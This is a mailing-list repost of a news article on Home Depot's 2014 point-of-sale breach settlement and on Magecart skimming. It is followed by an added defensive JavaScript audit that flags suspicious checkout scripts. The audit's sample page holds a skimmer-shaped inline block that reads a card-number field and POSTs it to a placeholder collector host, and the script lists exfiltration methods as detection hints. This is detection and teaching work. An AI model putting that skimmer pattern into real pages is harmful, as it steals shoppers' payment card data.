[BreachExchange] Home Depot agrees to $17.5 million settlement over 2014 data breach

Destry Winant destry at riskbasedsecurity.com
Wed Nov 25 10:32:38 EST 2020


https://www.zdnet.com/article/home-depot-agrees-to-17-5m-settlement-over-2014-data-breach/

Home Depot has agreed to a $17.5 million settlement in a multi-state
investigation of a data breach suffered by the company in 2014.

Delaware Attorney-General Kathy Jennings announced the settlement on
Tuesday, in which a total of 46 states, as well as the District of
Columbia, have reached a resolution with the US retailer.

In 2014, Home Depot confirmed that a cyberattack had occurred on its
payment systems, impacting customers across the US and Canada.

Starting in April 2014 and detected in September of the same year, the
cyberattack mirrored what was also experienced by rival retailer
Target in 2013, in which point-of-sale (PoS) systems were infected
with malware designed to steal payment card data.

Approximately 40 million Home Depot customers were impacted by the PoS
malware, which remained hidden on the company's self-checkout systems
for months.

Stolen payment card data of this kind can be used to make fraudulent
purchases online or to create cloned cards, potentially leading to
consumer bank accounts being pilfered and credit ratings being damaged.

Alongside the settlement, Home Depot has agreed to implement and
maintain new security practices in the future. These include employing
a chief information security officer (CISO), providing security
awareness training, and rolling out network access security
improvements, two-factor authentication (2FA) standards, and more.

"Retailers must take meaningful steps to protect consumers' credit and
debit card information from theft when they shop," said Massachusetts
AG Maura Healey. "This settlement ensures Home Depot complies with our
state's strong data security law and requires the company to take
steps to protect consumer information from illegal use or disclosure."

At the time of Home Depot's breach, online customers were not
affected. Six years on, we now commonly see payment card information
being harvested across e-commerce websites in what are known as
Magecart attacks.

Instead of infiltrating corporate networks in order to strike PoS
systems, Magecart operators exploit vulnerabilities in online
platforms and deploy JavaScript code able to skim and steal payment
information submitted by customers when they make a purchase.
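An added example, not from the article or from Home Depot: a defender-side audit of the scripts on a saved checkout page, flagging the conditions a Magecart-style skimmer creates (a script loaded from an origin outside the site's allowlist, an allowlisted script shipped without Subresource Integrity, or inline script that both reads card fields and sends data off the page). The allowlist, hostnames and sample HTML are constructed; the regex scan is used so it runs offline under Node without a DOM library.

```javascript
// Constructed allowlist of origins that are permitted to serve script on checkout.
const ALLOWED_SCRIPT_ORIGINS = ['https://shop.example', 'https://cdn.shop.example'];
const SITE_BASE = 'https://shop.example'; // used to resolve relative src values

// Heuristics: field names a skimmer must read, and ways script can send data out.
const PAYMENT_FIELD_HINTS = ['cardNumber', 'card_number', 'cvv', 'cvc', 'expiry'];
const EXFIL_HINTS = ['fetch(', 'XMLHttpRequest', 'sendBeacon', 'new Image(', '.src='];

// Walk every <script> tag in the captured HTML and return a list of findings.
function auditCheckoutScripts(html, allowedOrigins = ALLOWED_SCRIPT_ORIGINS) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    const srcMatch = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (srcMatch) {
      let origin = null;
      try { origin = new URL(srcMatch[1], SITE_BASE).origin; } catch (_) { /* malformed src */ }
      if (!origin || !allowedOrigins.includes(origin)) {
        findings.push({ kind: 'external-script-not-allowlisted', src: srcMatch[1] });
      } else if (!/\bintegrity\s*=/i.test(attrs)) {
        // Allowlisted host, but no SRI hash: a swapped file on that host would load unnoticed.
        findings.push({ kind: 'allowlisted-script-without-sri', src: srcMatch[1] });
      }
    } else {
      const touchesPayment = PAYMENT_FIELD_HINTS.some((h) => body.includes(h));
      const sendsData = EXFIL_HINTS.some((h) => body.includes(h));
      if (touchesPayment && sendsData) {
        findings.push({ kind: 'inline-script-reads-payment-fields-and-sends', snippet: body.trim().slice(0, 60) });
      }
    }
  }
  return findings;
}

// Constructed sample checkout page: one clean script, one without SRI, one
// third-party script off the allowlist, and one inline block shaped like a skimmer.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<script src="/static/checkout.js" integrity="sha384-PLACEHOLDER"></script>
<script src="https://cdn.shop.example/jquery.js"></script>
<script src="https://static.unrelated-host.invalid/analytics.js"></script>
<script>
  var n = document.getElementById('cardNumber').value;
  fetch('https://collector.invalid/log', { method: 'POST', body: n });
</script>
</body></html>`;

console.log(JSON.stringify(auditCheckoutScripts(SAMPLE_CHECKOUT_HTML), null, 2));
```

Running the audit over a regular capture of the live checkout page and diffing the findings against the previous run turns an unexpected script origin or a new inline block into an alert rather than a months-long silent compromise.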


More information about the BreachExchange mailing list